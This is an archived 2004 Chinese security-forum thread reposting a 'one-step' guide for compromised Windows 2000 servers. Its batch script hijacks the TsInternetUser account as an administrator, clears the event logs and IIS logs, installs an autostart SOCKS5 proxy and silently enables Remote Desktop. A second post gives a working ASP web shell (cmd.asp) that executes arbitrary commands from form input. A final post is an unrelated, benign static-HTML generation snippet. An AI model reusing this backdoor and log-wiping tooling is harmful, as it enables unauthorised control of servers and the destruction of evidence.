邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » [转载]安装3389 SOCKS5 删日志一步到位 [查看完整版本]

exploit 2004-11-16 03:50

[转载]安装3389 SOCKS5 删日志一步到位

来源：『爱国者II』技术安全网络

作者：见习刺客

最有效的安装3389终端，SOCKS5代理！删除日志。这里讲的是一步到位的方法！
首先需要几个软件
第一个是snake写的socks5代理
第二个是cleaniislog.exe
第三个是winshell
开始操作：打开--开始--程序--附件--笔记本

写入：
--------------------------------------------
echo off

net user TsInternetUser 12345 <--TsInternetUser是win2k默认用户，我们更改密码

net localgroup administrators TsInternetUser /add <-添加到超级用户组->

net use \\127.0.0.1\ipc$Content$nbsp;"12345" /user:"TsInternetUser" <-连接登陆，删除日志->

cleaniislog.exe -s \\127.0.0.1 -l "application" -C

cleaniislog.exe -s \\127.0.0.1 -l "system" -C

cleaniislog.exe -s \\127.0.0.1 -l "security" -C

net stop w3svc <-停掉IIS，删除记录->

del c:\winnt\system32\logfiles\*.*/s /f /q <-先删C盘下的日志->

del d:\winnt\system32\logfiles\*.*/s /f /q <-再删D盘下的日志->

net START w3svc <-启动IIS，恢复WEB正常工作->

sss -install <-安装socks5代理->

sss -config starttype 2 <-系统启动后自动运行->

sss -config port 1080 <-在1080端口服务，也可以更换其它端口->

net start skserver <-启动服务->

echo [Components] > %systemroot%\sql <-安装3389终端->
echo TSEnable = on >> %systemroot%\sql
sysocmgr /i:%systemroot%\inf\sysoc.inf /u:%systemroot%\sql /q

cmd.asp [自定cmd.exe地址]
见习刺客 - 2004-11-15 12:26:39
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="cmd.exe地址，可更改可默认"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="cmd命令"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="cmd.exe地址，可更改可默认" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea>
cmd.asp
不用模板只用ASP+FSO生成静态HTML页的一个方法
见习刺客 - 2004-11-15 12:25:31
FSO生成静态HTML文件的时候替换模板标签一直是一个很麻烦的问题，至少我是这么认为的，还要别外做一个模板，麻烦！，我今天看见有一个方法可以解决这个问题

如一个正常的index.asp页面，并且用ASP代码调出数据库中的内容，另建一个makehtml.asp的页面，加入一个textarea域，假设为name="body"，将index.asp在textarea里调出来，如：
<textarea name="body"><!--#include file="index.asp"--></textarea>，将这个textarea包含在表单中，在接收表单页用创建FSO对象，如下生成index.html文件！

<%
filename="../index.html"
if request("body")<>"" then
set fso = Server.CreateObject("Scripting.FileSystemObject")
set fout = fso.CreateTextFile(server.mappath(""&filename&""))
fout.write request.form("body")
fout.close
set fout=nothing
set fso=nothing
end if
%>

这样index.html文件就生成了，连模板都用不着，只要将正常情况下使用的ASP文件读取到textarea里就可以了，目前尚未发现问题！当然前提是服务器要支持FSO.

查看完整版本: [转载]安装3389 SOCKS5 删日志一步到位

© 1999-2008 EvilOctal Security Team